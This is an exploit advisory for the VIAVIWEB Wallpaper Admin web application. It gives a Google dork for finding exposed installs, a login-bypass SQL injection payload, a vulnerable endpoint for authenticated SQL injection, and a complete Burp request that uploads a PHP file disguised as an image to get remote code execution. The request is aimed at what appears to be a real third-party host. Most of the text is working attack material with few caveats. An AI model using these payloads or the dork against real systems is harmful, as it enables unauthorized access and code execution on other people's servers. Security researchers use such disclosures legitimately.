Headline
VIAVIWEB Wallpaper Admin SQL Injection / Shell Upload
VIAVIWEB Wallpaper Admin suffers from remote shell upload and remote SQL injection vulnerabilities.
```# Exploit Title: [VIAVIWEB Wallpaper Admin - Multiple vulnrabilities]# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"# Date: [18/09/2022]# Exploit Author: [Edd13Mora]# Vendor Homepage: [www.viaviweb.com]# Version: [N/A]# Tested on: [Windows 11 - Kali Linux]------------------SQLI on the Login page------------------payload --> admin' or 1=1-- ----POC:---[1] Disable JavaScript on ur browser put the payload and submit[2] Reactive JavaScript and resend the request---------------------------Authenticated SQL Injection:---------------------------Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]-----------------------------------------------Remote Code Execution (RCE none authenticated):-----------------------------------------------Poc:----Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes--------------------Burp Request :--------------------POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2Host: http://googlezik.freehostia.comCookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848Content-Length: 467Origin: http://googlezik.freehostia.comReferer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yesUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="category_id"1-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="image[]"; filename="poc.php"Content-Type: image/png<?php phpinfo(); ?>-----------------------------33893919268150571572221367848Content-Disposition: form-data; name="submit"-----------------------------33893919268150571572221367848--Uploaded File can be found here :--------------------------------http://localhost/PAth-Where-Script-Installed/categories/```